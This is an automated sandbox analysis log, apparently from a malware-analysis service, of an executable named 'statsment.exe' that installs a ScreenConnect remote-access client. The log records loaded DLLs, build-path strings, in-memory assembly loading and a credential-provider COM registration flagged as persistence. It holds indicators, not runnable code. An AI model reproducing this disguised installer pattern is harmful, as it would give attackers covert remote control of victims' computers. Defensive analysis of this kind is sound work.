                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: statsment.exeStatic PE information: certificate valid
                              Source: statsment.exeStatic file information: File size 5652448 > 1048576
                              Source: statsment.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statsment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: statsment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statsment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statsment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statsment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1735043722.000000000041D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1714393742.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statsment.exe, 59d159.rbs.2.dr, 59d15a.msi.2.dr, MSID438.tmp.2.dr, 59d158.msi.2.dr, MSID418.tmp.2.dr, MSID756.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statsment.exe, 59d15a.msi.2.dr, 59d158.msi.2.dr, MSICAFF.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statsment.exe
                              Source: statsment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: statsment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: statsment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: statsment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: statsment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.statsment.exe.2970000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.statsment.exe.7878f8.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statsment.exeStatic PE information: real checksum: 0x54fd91 should be: 0x5727ba
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_010E6F00 push eax; mov dword ptr [esp], ecx0_2_010E6F11
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_05425522 push eax; retf 0_2_05425529
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_071071A1 push FFFFFFC3h; ret 4_3_07107179
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_013F7738 push eax; iretd 7_2_013F7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_013F7754 push 8401A5CFh; iretd 7_2_013F7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E34431 push esp; ret 7_2_05E34443
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F3453 push ecx; iretd 8_2_00007FFD9B6F350C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F37B3 push edi; iretd 8_2_00007FFD9B6F37B6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F7D94 push ss; iretd 8_2_00007FFD9B6F7D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70987A push cs; iretd 9_2_00007FFD9B709C1F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B701599 push eax; iretd 9_2_00007FFD9B70159A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70999F push cs; iretd 9_2_00007FFD9B709C1F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B703CF2 push eax; iretd 9_2_00007FFD9B703D31

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
